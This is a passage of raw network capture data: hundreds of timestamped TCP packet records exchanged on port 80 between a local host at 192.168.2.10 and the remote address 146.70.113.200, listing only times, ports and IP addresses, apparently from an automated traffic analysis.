Dec 2, 2024 07:38:28.893613100 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:28.893739939 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:29.013586998 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433433056 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433459997 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433470964 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433587074 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433598042 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433610916 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433625937 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433631897 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.433631897 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.433653116 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.433829069 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433841944 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433850050 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.433904886 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.553602934 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.553641081 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.553742886 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.557796955 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.606903076 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.655704021 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.655822992 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.655889034 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.659887075 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.661452055 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.661542892 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.661555052 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.669873953 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.669944048 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.669971943 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.678286076 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.678386927 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.678404093 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.686732054 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.686821938 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.686831951 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.695096970 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.695159912 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.695202112 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.703502893 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.703547001 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.703675032 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.711891890 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.712003946 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.712032080 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.720326900 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.720393896 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.720418930 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.728724003 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.728771925 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.728780985 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.737143040 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.737354994 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.878108025 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.878134966 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.878231049 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.879782915 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.879935026 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.880088091 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.885494947 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.885617018 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.885663033 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.891206980 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.891376972 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.891427994 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.896903992 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.897006035 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.897059917 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.902601004 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.902734041 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.902791023 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.908298016 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.908412933 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.908463955 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.914028883 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.914119005 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.914180994 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.919709921 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.919821024 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.919867992 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.925472021 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.925579071 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.925643921 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.931129932 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.931191921 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.931238890 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.936866045 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.936969995 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.937036991 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.942588091 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.942631960 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.942681074 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.948280096 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.948402882 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.948453903 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.953968048 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.954073906 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.954118967 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.959692001 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.959805012 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.959856033 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.965406895 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.965528965 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.965584040 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.971111059 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.971277952 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.971330881 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.976814032 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.976942062 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.976991892 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.982561111 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.982731104 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:30.982778072 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:30.988281965 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.044423103 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.100836039 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.100955963 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.101008892 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.102818012 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.102921009 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.102968931 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.106863976 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.106941938 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.107000113 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.111321926 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.111401081 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.111452103 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.115549088 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.115638971 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.115691900 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.118735075 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.118793011 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.118843079 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.122714043 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.122828007 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.122874022 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.126590967 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.126708031 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.126764059 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.130559921 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.130662918 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.130790949 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.134469032 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.134569883 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.134624958 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.138401031 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.138504982 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.138551950 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.142322063 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.142416954 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.142465115 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.146255016 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.146370888 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.146419048 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.150191069 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.150296926 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.150340080 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.154145956 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.154253960 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.154309034 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.158185959 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.158200026 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.158246040 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.162014008 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.162069082 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.162113905 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.165894985 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.165996075 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.166044950 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.169820070 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.169948101 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.169994116 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.173774004 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.173875093 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.173930883 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.177730083 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.177814960 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.177866936 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.181637049 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.181727886 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.181776047 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.185589075 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.185678005 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.185728073 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.189482927 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.189588070 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.189636946 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.193439960 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.193574905 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.193622112 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.197377920 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.197464943 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.197514057 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.201327085 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.201428890 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.201489925 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.205210924 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.205296993 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.205354929 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.209146023 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.209244967 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.209292889 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.213073015 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.213182926 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.213238001 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.217204094 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.217226028 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.217276096 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.221014023 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.221160889 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.221216917 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.323028088 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.323105097 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.323170900 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.323868990 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.324017048 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.324065924 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.326571941 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.326780081 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.326837063 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.329355001 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.329462051 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.329519987 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.332108021 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.332221031 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.332274914 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.334909916 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.334991932 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.335043907 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.337533951 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.337625027 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.337677956 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.340359926 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.340476036 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.340518951 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.342983961 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.343060970 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.343110085 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.345413923 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.345485926 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.345650911 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.348020077 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.348120928 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.348169088 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.350497961 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.350594997 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.350642920 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.353056908 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.353110075 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.353183985 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.355695963 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.355802059 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.355886936 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.358148098 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.358257055 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.358334064 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.360692978 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.360797882 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.360872984 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.363234043 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.363356113 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.363425970 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.365792990 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.365890026 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.365963936 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.368437052 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.368561029 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.368630886 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.370891094 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.371145010 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.371212959 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.373415947 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.373508930 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.373585939 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.375921965 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.376019955 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.376094103 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.378498077 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.378588915 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.378667116 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.381038904 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.381145954 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.381218910 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.383585930 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.383685112 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.383738995 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.386135101 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.386229038 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.386274099 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.388695002 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.388859987 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.388904095 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.391268969 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.391355038 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.391400099 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.393775940 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.393867016 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.393915892 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.396356106 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.396394014 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.396446943 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.398864985 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.398899078 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.398951054 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.401381969 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.401480913 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.401530981 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.403964043 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.404026985 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.404076099 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.406472921 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.406595945 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.406647921 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.409037113 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.409095049 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.409148932 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.411583900 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.411631107 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.411712885 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.414110899 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.414225101 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.414298058 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.416722059 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.416737080 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.416812897 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.419195890 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.419272900 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.419392109 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.421768904 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.421897888 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.421973944 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.424351931 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.424447060 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.424524069 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.426862001 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.426959991 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.427033901 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.429418087 CET	80	49773	146.70.113.200	192.168.2.10
